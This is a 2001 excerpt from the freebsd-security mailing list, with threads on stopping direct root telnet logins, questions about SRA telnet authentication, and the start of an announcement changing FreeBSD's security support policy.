Content-Type: multipart/alternative; boundary="----=_NextPart_000_0048_01C0DA27.B168F7C0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0048_01C0DA27.B168F7C0 Content-Type: text/plain; charset="gb2312" Content-Transfer-Encoding: base64 SSBleHBlY3QgYSBhbnN3ZXIgYWJvdXQgU1JBIHRvby4NCg== ------=_NextPart_000_0048_01C0DA27.B168F7C0 Content-Type: text/html; charset="gb2312" Content-Transfer-Encoding: base64 PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9uYWwv L0VOIj4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWdi MjMxMiIgaHR0cC1lcXVpdj1Db250ZW50LVR5cGU+DQo8TUVUQSBjb250ZW50PSJNU0hUTUwgNS4w MC4yNjE0LjM1MDAiIG5hbWU9R0VORVJBVE9SPg0KPFNUWUxFPjwvU1RZTEU+DQo8L0hFQUQ+DQo8 Qk9EWSBiZ0NvbG9yPSNmZmZmZmY+DQo8RElWPjxGT05UIHNpemU9Mj5JIGV4cGVjdCBhIGFuc3dl ciBhYm91dCBTUkEgdG9vLjwvRk9OVD48L0RJVj48L0JPRFk+PC9IVE1MPg0K ------=_NextPart_000_0048_01C0DA27.B168F7C0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 0:21:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (Postfix) with ESMTP id 5CA5737B422 for ; Fri, 11 May 2001 00:21:20 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu) Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id JAA15214; Fri, 11 May 2001 09:21:18 +0200 (MET DST) Received: (from zgabor@localhost) by zg.CoDe.hu (8.11.3/8.11.1) id f4B7JmC00321; Fri, 11 May 2001 07:19:48 GMT (envelope-from zgabor) Date: Fri, 11 May 2001 07:19:47 +0000 From: Gabor Zahemszky To: freebsd-security@freebsd.org Cc: mike@sentex.net Subject: Re: preventing direct root login on telnetd Message-ID: <20010511071947.C264@zg.CoDe.hu> References: <4.2.2.20010511000303.036916f8@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.2.2.20010511000303.036916f8@192.168.0.12>; from mike@sentex.net on Fri, May 11, 2001 at 12:09:09AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 11, 2001 at 12:09:09AM -0400, Mike Tancsa wrote: > > Is there a way to prevent root from logging in directly on STABLE via telnet ? Direct root logins are enabled/disabled via /etc/ttys, aren't it? --- # status Must be on or off. If on, init will run the getty program on # the specified port. If the word "secure" appears, this tty # allows root login. --- # Pseudo terminals ttyp0 none network on secure ttyp1 none network off --- Or maybe via the /etc/login.access file. man login.access Btw. Don't use telnet, and never login as root. Use `su' instead. ZGabor at CoDe dot HU -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 0:42:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id 44BC637B422 for ; Fri, 11 May 2001 00:42:20 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 ([195.161.98.236]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id PAA91577; Fri, 11 May 2001 15:42:00 +0800 (KRAST) (envelope-from poige@morning.ru) Date: Fri, 11 May 2001 15:44:42 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <911676911.20010511154442@morning.ru> To: Jussi Jaurola Cc: Mike Tancsa , security@FreeBSD.ORG Subject: Re[2]: preventing direct root login on telnetd In-Reply-To: References: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Use /etc/hosts.allow. it doesn't allow to limit logins by user names... > But I think that telnet protocol is so crappy that > use ssh instead? -- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 0:48:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from gobbe.net (gobbe.net [212.83.113.102]) by hub.freebsd.org (Postfix) with ESMTP id 58BEF37B423 for ; Fri, 11 May 2001 00:48:49 -0700 (PDT) (envelope-from gobbe@gobbe.net) Received: from localhost (gobbe@localhost) by gobbe.net (8.9.3/8.9.3) with ESMTP id KAA04082; Fri, 11 May 2001 10:45:16 +0300 (EEST) (envelope-from gobbe@gobbe.net) Date: Fri, 11 May 2001 10:45:15 +0300 (EEST) From: Jussi Jaurola To: Igor Podlesny Cc: Mike Tancsa , security@FreeBSD.ORG Subject: Re: Re[2]: preventing direct root login on telnetd In-Reply-To: <911676911.20010511154442@morning.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Oh yeah, sorry :) I misunderstanded your meaning. But why dont you just use ssh? It's much more reliable and better then telnet. -- Jussi P. Jaurola Network Security Engineer gobbe@gobbe.net Netello Systems, Ltd. http://gobbe.net +358 50 566 9183 On Fri, 11 May 2001, Igor Podlesny wrote: > > > Use /etc/hosts.allow. > it doesn't allow to limit logins by user names... > > > But I think that telnet protocol is so crappy that > > use ssh instead? > > -- > Igor mailto:poige@morning.ru > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 0:53:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id D4E5F37B422 for ; Fri, 11 May 2001 00:53:32 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 ([195.161.98.236]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id PAA92131; Fri, 11 May 2001 15:53:25 +0800 (KRAST) (envelope-from poige@morning.ru) Date: Fri, 11 May 2001 15:56:08 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <1182362066.20010511155608@morning.ru> To: Jussi Jaurola Cc: Mike Tancsa , security@FreeBSD.ORG Subject: Re[4]: preventing direct root login on telnetd In-Reply-To: References: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Oh yeah, sorry :) I misunderstanded your meaning. > But why dont you just > use ssh? i do -- you're mistaken again -- it was another person's question... > It's much more reliable and better then telnet. -- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 2:41:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from www.suntop-cn.com (www.suntop-cn.com [61.140.76.155]) by hub.freebsd.org (Postfix) with ESMTP id 2F09837B422 for ; Fri, 11 May 2001 02:41:06 -0700 (PDT) (envelope-from slack@www.suntop-cn.com) Received: from rep1 ([61.140.208.60]) by www.suntop-cn.com (8.11.3/8.11.3) with SMTP id f4B7FPx28544 for ; Fri, 11 May 2001 15:15:25 +0800 (CST) (envelope-from slack@www.suntop-cn.com) Message-ID: <007d01c0d9ea$27560f60$5801a8c0@suntop.com> From: "edwin chan" To: Subject: SRA Date: Fri, 11 May 2001 15:15:21 +0800 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0078_01C0DA2D.3265F4E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0078_01C0DA2D.3265F4E0 Content-Type: text/plain; charset="gb2312" Content-Transfer-Encoding: base64 V2hlbiBJIGxvZ2luIGZyb20gYSBGcmVlQlNEIGJveCB0byBhbm90aGVyIEZyZWVCU0QgYm94LCBT UkEgbG9naW4gcHJvbXB0IGFwcGVhciwgYnV0IGZyb20gd2luOTggYm94IHRvIEZyZWVCU0QgYm94 LCBub3QgU1JBIHByb21wdCBhcHBlYXIuKCBib3RoIEZyZWVic2QgcnVuaW5nIDQuM3ZlcnNpb24p DQoNCkkgc2VhcmNoZWQgbWFueSBkb2N1bWVudHMgYnV0IGNhbid0IGZvdW5kIGp1c3QgYSBtZW50 aW9uIGFib3V0IFNSQS4NCg== ------=_NextPart_000_0078_01C0DA2D.3265F4E0 Content-Type: text/html; charset="gb2312" Content-Transfer-Encoding: base64 PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9uYWwv L0VOIj4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWdi MjMxMiIgaHR0cC1lcXVpdj1Db250ZW50LVR5cGU+DQo8TUVUQSBjb250ZW50PSJNU0hUTUwgNS4w MC4yNjE0LjM1MDAiIG5hbWU9R0VORVJBVE9SPg0KPFNUWUxFPjwvU1RZTEU+DQo8L0hFQUQ+DQo8 Qk9EWSBiZ0NvbG9yPSNmZmZmZmY+DQo8RElWPjxGT05UIHNpemU9Mj5XaGVuIEkgbG9naW4gZnJv bSBhIEZyZWVCU0QgYm94IHRvIGFub3RoZXIgRnJlZUJTRCBib3gsIFNSQSANCmxvZ2luIHByb21w dCBhcHBlYXIsIGJ1dCBmcm9tIHdpbjk4IGJveCB0byBGcmVlQlNEIGJveCwgbm90IFNSQSBwcm9t cHQgYXBwZWFyLiggDQpib3RoIEZyZWVic2QgcnVuaW5nIDQuM3ZlcnNpb24pPC9GT05UPjwvRElW Pg0KPERJVj4mbmJzcDs8L0RJVj4NCjxESVY+PEZPTlQgc2l6ZT0yPkkgc2VhcmNoZWQgbWFueSBk b2N1bWVudHMgYnV0IGNhbid0IGZvdW5kIGp1c3QgYSBtZW50aW9uIGFib3V0IA0KU1JBLjwvRk9O VD48L0RJVj48L0JPRFk+PC9IVE1MPg0K ------=_NextPart_000_0078_01C0DA2D.3265F4E0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 2:41:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from www.suntop-cn.com (www.suntop-cn.com [61.140.76.155]) by hub.freebsd.org (Postfix) with ESMTP id 1B89B37B424 for ; Fri, 11 May 2001 02:41:10 -0700 (PDT) (envelope-from huacheng@public.guangzhou.gd.cn) Received: from rep1 ([61.140.208.60]) by www.suntop-cn.com (8.11.3/8.11.3) with SMTP id f4B6XCx28427 for ; Fri, 11 May 2001 14:33:13 +0800 (CST) (envelope-from huacheng@public.guangzhou.gd.cn) Message-ID: <004201c0d9e4$419db7c0$5801a8c0@suntop.com> From: "edwin chan" To: References: Subject: Re: preventing direct root login on telnetd Date: Fri, 11 May 2001 14:33:08 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: base64 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org SSBleHBlY3QgaGF2ZSBhIGFuc3dlciBhYm91dCBTUkEuDQoNCg0KLS0tLS0gT3JpZ2luYWwgTWVz c2FnZSAtLS0tLSANCkZyb206IEp1c3NpIEphdXJvbGEgPGdvYmJlQGdvYmJlLm5ldD4NClRvOiBN aWtlIFRhbmNzYSA8bWlrZUBzZW50ZXgubmV0Pg0KQ2M6IDxzZWN1cml0eUBGcmVlQlNELk9SRz4N ClNlbnQ6IEZyaWRheSwgTWF5IDExLCAyMDAxIDE6NTcgUE0NClN1YmplY3Q6IFJlOiBwcmV2ZW50 aW5nIGRpcmVjdCByb290IGxvZ2luIG9uIHRlbG5ldGQNCg0KDQo+IFVzZSAvZXRjL2hvc3RzLmFs bG93LiBCdXQgSSB0aGluayB0aGF0IHRlbG5ldCBwcm90b2NvbCBpcyBzbyBjcmFwcHkgdGhhdA0K PiB1c2Ugc3NoIGluc3RlYWQ/DQo+IA0KPiAtLSANCj4gSnVzc2kgUC4gSmF1cm9sYSAgICAgICBO ZXR3b3JrIFNlY3VyaXR5IEVuZ2luZWVyDQo+IGdvYmJlQGdvYmJlLm5ldCAgICAgICBOZXRlbGxv IFN5c3RlbXMsIEx0ZC4NCj4gaHR0cDovL2dvYmJlLm5ldCAgICAgICArMzU4IDUwIDU2NiA5MTgz DQo+IA0KPiANCj4gT24gRnJpLCAxMSBNYXkgMjAwMSwgTWlrZSBUYW5jc2Egd3JvdGU6DQo+IA0K PiA+IA0KPiA+IElzIHRoZXJlIGEgd2F5IHRvIHByZXZlbnQgcm9vdCBmcm9tIGxvZ2dpbmcgaW4g ZGlyZWN0bHkgb24gU1RBQkxFIHZpYSB0ZWxuZXQgPw0KPiA+IA0KPiA+IC0tLU1pa2UNCj4gPiAt LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLQ0KPiA+IE1pa2UgVGFuY3NhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgIHRlbCArMSA1MTkgNjUxIDM0MDANCj4gPiBOZXR3b3JrIEFkbWluaXN0cmF0aW9uLCAg ICAgICBtaWtlQHNlbnRleC5uZXQNCj4gPiBTZW50ZXggQ29tbXVuaWNhdGlvbnMgICAgICAgICAg ICAgICAgICAgd3d3LnNlbnRleC5uZXQNCj4gPiBDYW1icmlkZ2UsIE9udGFyaW8gQ2FuYWRhICAg d3d3LnNlbnRleC5uZXQvbWlrZQ0KPiA+IA0KPiA+IA0KPiA+IFRvIFVuc3Vic2NyaWJlOiBzZW5k IG1haWwgdG8gbWFqb3Jkb21vQEZyZWVCU0Qub3JnDQo+ID4gd2l0aCAidW5zdWJzY3JpYmUgZnJl ZWJzZC1zZWN1cml0eSIgaW4gdGhlIGJvZHkgb2YgdGhlIG1lc3NhZ2UNCj4gPiANCj4gDQo+IA0K PiBUbyBVbnN1YnNjcmliZTogc2VuZCBtYWlsIHRvIG1ham9yZG9tb0BGcmVlQlNELm9yZw0KPiB3 aXRoICJ1bnN1YnNjcmliZSBmcmVlYnNkLXNlY3VyaXR5IiBpbiB0aGUgYm9keSBvZiB0aGUgbWVz c2FnZQ0KPiANCg== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 2:46:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from www.suntop-cn.com (www.suntop-cn.com [61.140.76.155]) by hub.freebsd.org (Postfix) with ESMTP id 5C42237B422 for ; Fri, 11 May 2001 02:43:47 -0700 (PDT) (envelope-from huacheng@public.guangzhou.gd.cn) Received: from gate.suntop.com ([61.140.208.60]) by www.suntop-cn.com (8.11.3/8.11.3) with ESMTP id f4B1mKx27215 for ; Fri, 11 May 2001 09:48:30 +0800 (CST) (envelope-from huacheng@public.guangzhou.gd.cn) Received: from rep1 (rep1.suntop.com [192.168.1.88]) by gate.suntop.com (8.11.3/8.11.3) with SMTP id f485kCa20466 for ; Tue, 8 May 2001 13:46:13 +0800 (CST) (envelope-from huacheng@public.guangzhou.gd.cn) Message-ID: <000c01c0d782$32179320$5801a8c0@suntop.com> From: "edwin chan" To: References: <20010507123414.X2167-100000@citadel.simphost.com> Subject: Re: SRA.. Date: Tue, 8 May 2001 13:46:13 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: base64 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org SSBoYXZlIHRoZSBzYW1lIHF1ZXN0aW9uIGFzIHlvdSBhc2tlZC4gZXhwZWN0IGFuc3dlciB0b28u IDspDQoNCi0tLS0tIE9yaWdpbmFsIE1lc3NhZ2UgLS0tLS0gDQpGcm9tOiBqbHNjaHdhYiA8amxz Y2h3YWJAc2ltcGhvc3QuY29tPg0KVG86IDxmcmVlYnNkLXF1ZXN0aW9uc0BmcmVlYnNkLm9yZz47 IDxmcmVlYnNkLXNlY3VyaXR5QGZyZWVic2Qub3JnPg0KU2VudDogVHVlc2RheSwgTWF5IDA4LCAy MDAxIDEyOjM1IEFNDQpTdWJqZWN0OiBTUkEuLg0KDQoNCj4gSGV5YSBHdXlzIGFuZCBHYWxzOw0K PiANCj4gVHJ5aW5nIGFueS5vZi5teS5tYWNoaW5lcy5pcHMuLi4NCj4gQ29ubmVjdGVkIHRvIFgu WC5YLlguDQo+IEVzY2FwZSBjaGFyYWN0ZXIgaXMgJ15dJy4NCj4gVHJ5aW5nIFNSQSBzZWN1cmUg bG9naW46DQo+IFVzZXIgKHJvb3QpOiBQYXNzd29yZDoNCj4gDQo+IHdoYXQgaXMgU1JBLCBzZWN1 cmUgdGVsbmV0IGxvZ2luPw0KPiBhbmQgaG93IGNhbiBJIGRpc2FibGUgdGhpcz8NCj4gDQo+IEkg YWxzbyBub3RpY2VkIGl0IG9ubHkgd29ya3MgZnJvbSBmcmVlYnNkIC0+IGZyZWVic2QgYm94ZXMN Cj4gDQo+IHRoYW5rcy4NCj4gDQo+IA0KPiANCj4gVG8gVW5zdWJzY3JpYmU6IHNlbmQgbWFpbCB0 byBtYWpvcmRvbW9ARnJlZUJTRC5vcmcNCj4gd2l0aCAidW5zdWJzY3JpYmUgZnJlZWJzZC1zZWN1 cml0eSIgaW4gdGhlIGJvZHkgb2YgdGhlIG1lc3NhZ2UNCj4gDQo= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 2:46:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from www.suntop-cn.com (www.suntop-cn.com [61.140.76.155]) by hub.freebsd.org (Postfix) with ESMTP id BE8C837B424 for ; Fri, 11 May 2001 02:46:16 -0700 (PDT) (envelope-from huacheng@public.guangzhou.gd.cn) Received: from gate.suntop.com ([61.140.208.60]) by www.suntop-cn.com (8.11.3/8.11.3) with ESMTP id f4B1oix27236 for ; Fri, 11 May 2001 09:50:44 +0800 (CST) (envelope-from huacheng@public.guangzhou.gd.cn) Received: from rep1 (rep1.suntop.com [192.168.1.88]) by gate.suntop.com (8.11.3/8.11.3) with SMTP id f4B1oc825190 for ; Fri, 11 May 2001 09:50:39 +0800 (CST) (envelope-from huacheng@public.guangzhou.gd.cn) Message-ID: <001b01c0d9bc$c7e00400$5801a8c0@suntop.com> From: "edwin chan" To: References: <3AFB369D.5574182A@enter.net> Subject: Re: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins? Date: Fri, 11 May 2001 09:50:38 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: base64 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org SSBoYXZlIHRoZSBzYW1lIHF1ZXN0aW9uLCBJIHNlYXJjaGVkIG1hbnkgZG9jdW1lbnRzIGJ1dCBj YW4ndCBmb3VuZCBhIGFuc3dlciB0b28uDQpob3BlIHNvbWVvbmUgY2FuIGhlbHAgdXMuDQoNCmVk d2luIGNoYW4NCg0KDQotLS0tLSBPcmlnaW5hbCBNZXNzYWdlIC0tLS0tIA0KRnJvbTogRGFuaWVs IEhhdWVyIDxkaEBlbnRlci5uZXQ+DQpUbzogPGZyZWVic2Qtc2VjdXJpdHlAZnJlZWJzZC5vcmc+ DQpTZW50OiBGcmlkYXksIE1heSAxMSwgMjAwMSA4OjQ3IEFNDQpTdWJqZWN0OiBGcmVlQlNEIDQu MyBSRUxFQVNFIGFuZCAtU1RBQkxFIGFsbG93cyB0ZWxuZXQgcm9vdCBsb2dpbnM/DQoNCg0KPiBI ZWxsbyBhbGwsDQo+ICAgQWZ0ZXIgaW5zdGFsbGluZyA0LjMgcmVsZWFzZSBvbiBvbmUgbWFjaGlu ZSBhbmQgdXBncmFkaW5nIDIgb3RoZXINCj4gbWFjaGluZXMgdG8gLVNUQUJMRSwgSSBub3RpY2Vk IHRoZXJlIGlzIGEgbmV3IG1lY2hhbmlzbSB1c2VkIGluIHRlbG5ldGQsDQo+IG5hbWVseSB0aGlz ICJTUkEiIGF1dGhlbnRpY2F0aW9uIG1lY2hhbmlzbS4gV2hpbGUgY29udmllbmllbnQsICh5b3UN Cj4gZG9uJ3QgaGF2ZSB0byB0eXBlIHlvdXIgdXNlcm5hbWUpIEkgZm91bmQgc29tZXRoaW5nIFZF UlkgZGlzdHVyYmluZzogSWYNCj4geW91IGFyZSBhdCBhIHJvb3QgcHJvbXB0IG9uIGFueSBvdGhl ciBCU0QNCj4gYmFzZWQgbWFjaGluZSwgeW91IGNhbiBqdXN0IHRlbG5ldCB0byB0aGUgNC4zIG1h Y2hpbmVzLCBhbmQgbG9naW4gcmlnaHQNCj4gaW4gd2l0aCB0aGUgcm9vdCB1c2VybmFtZSBhbmQg cGFzc3dvcmQhIFRoaXMgb25seSBhcHBhcmVudGx5IG9jY3VycyBmcm9tDQo+IGEgQlNEIGJhc2Vk IG1hY2hpbmUsIGFzIE15c2VsZiBhbmQgYSBjby13b3JrZXIgdHJpZWQgaXQgZnJvbSAyIGRpZmZl cmVudA0KPiBkaXN0cmlidXRpb24gTGludXggYm94ZXMsIGFuZCB3ZSBjb3VsZCBub3QgbG9naW4g YXMgcm9vdC4gTm9uZSBvZiB0aGUgDQo+IHN3aXRjaGVzIGZvciB0ZWxuZXRkIGluIHRoZSBpbmV0 ZC5jb25mIHdvcmtlZCB0byBvdXIgc2F0aXNmYWN0aW9uLCBhbmQNCj4gYWZ0ZXIgcmVhZGluZyB0 aGUgc291cmNlcywgd2UgcmVjb21waWxlZCB0ZWxuZXRkIHdpdGggQVVUSEVOVElDQVRJT049Tk8N Cj4gdG8gZGlzYWJsZSB0aGlzIGJlaGF2aW9yLiBXaGF0IGlzIHRoaXMgIlNSQSBhdXRoZW50aWNh dGlvbiIgPyBBbmQgd2h5IGlzDQo+IHRlbG5ldGQncyBkZWZhdWx0IGJlaGF2aW9yIHRvIGFsbG93 IHJvb3QgbG9naW5zIGF0IGFsbD8gSSByZWFsaXplIHRoYXQNCj4gYW55IHNlbGYgcmVzcGVjdGlu ZyBzeXNhZG1pbiB3aWxsIGVpdGhlciB1c2UgaXBmaXJld2FsbCwgaXBmaWx0ZXIsIG9yDQo+IGdv b2Qgb2xkIGluZXRkJ3MgaG9zdHMuYWxsb3cgZmlsZSB0byBsaW1pdCB0ZWxuZXQgbG9naW5zIGFu eXdheSwgYnV0IHRoZQ0KPiBxdWVzdGlvbiBzdGlsbCByZW1haW5zLi4uLiBXaHk/IFdvdWxkbid0 IHRoaXMgU1JBIHdpdGggYSAibm8gcm9vdCIgbG9naW4NCj4gYmUgYSBiZXR0ZXIgaWRlYT8gDQo+ IA0KPiAtLSANCj4gUmVnYXJkcywNCj4gRGFuaWVsIEhhdWVyDQo+IE5ldHdvcmsgQWRtaW5pc3Ry YXRpb24NCj4gaHR0cDovL3d3dy5lbnRlci5uZXQgICJUaGUgUm9hZCBUbyBUaGUgSW50ZXJuZXQg U3RhcnRzIFRoZXJlISIgDQo+ICoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKg0KPiBXaW5kb3plIGlzIGZvciBH QU1FUywgVU5JWCBpcyBmb3IgdGhlIHJlc3Qgb2YgdXMuICAgICAgICAgICAgICAgICAgIA0KPiBV TklYIGlzIGxpa2UgdGhlIHNpZ2h0cyBvbiBhIGxvYWRlZCBndW4uIElmIHlvdSBhaW0gdGhlIGd1 biAgICAgIA0KPiBhdCB5b3VyIGZvb3QgYW5kIHB1bGwgdGhlIHRyaWdnZXIsIGl0IGlzIHRoZSBi YXNpYyBmdW5jdGlvbiBvZiAgICAgICAgIA0KPiBVTklYIHRvIGFjY3VyYXRlbHkgZGVsaXZlciB0 aGUgYnVsbGV0IGZyb20gdGhlIGd1biB0byB0aGUNCj4gdGFyZ2V0LiBJbiB0aGlzIGNhc2UsIGl0 J3MgeW91ciBmb290LiANCj4gKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqDQo+IA0KPiBUbyBVbnN1YnNjcmli ZTogc2VuZCBtYWlsIHRvIG1ham9yZG9tb0BGcmVlQlNELm9yZw0KPiB3aXRoICJ1bnN1YnNjcmli ZSBmcmVlYnNkLXNlY3VyaXR5IiBpbiB0aGUgYm9keSBvZiB0aGUgbWVzc2FnZQ0KPiANCg== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 2:57:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (adam042-060.resnet.wisc.edu [146.151.42.60]) by hub.freebsd.org (Postfix) with ESMTP id 6500C37B423 for ; Fri, 11 May 2001 02:57:55 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 46327 invoked by uid 1000); 11 May 2001 09:57:48 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 11 May 2001 09:57:48 -0000 Date: Fri, 11 May 2001 04:57:48 -0500 (CDT) From: Mike Silbersack To: edwin chan Cc: Subject: Re: FreeBSD 4.3 RELEASE and -STABLE allows telnet root logins? In-Reply-To: <001b01c0d9bc$c7e00400$5801a8c0@suntop.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 11 May 2001, edwin chan wrote: > I have the same question, I searched many documents but can't found a answer too. > hope someone can help us. > > edwin chan http://www-cs-students.stanford.edu/~tjw/srp/ Note that in asking this five times, you reached your question quota for the next two weeks. Please wait that long before asking any more questions on this list. Thanks, Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 3:21: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 583C437B422; Fri, 11 May 2001 03:20:53 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f4BAKrL63777; Fri, 11 May 2001 03:20:53 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Date: Fri, 11 May 2001 03:20:53 -0700 (PDT) Message-Id: <200105111020.f4BAKrL63777@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: Changes to FreeBSD security support policy Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- This announcement describes a change in the security support status of the FreeBSD 3.x branch, as well as the introduction of two new methods for tracking security fixes to FreeBSD 4.3-RELEASE: a FreeBSD CVS branch based on 4.3-RELEASE which will contain security fixes only, and the intention to trial binary security update packages for users of FreeBSD 4.3-RELEASE on the i386 platform. 1) CHANGE IN SUPPORT FOR THE FREEBSD 3.x BRANCH -------------------------------------------- As of this point, the Security Officer Team will provide full vulnerability response (assessment, correction, notification) for the FreeBSD 4.x branch only; the FreeBSD 3.x branch will continue to see vulnerability response only for remotely exploitable vulnerabilities. This eliminates support for the class of vulnerabilities exploitable by users with accounts on the system. This is necessary due to substantial divergence of the supported 4.x 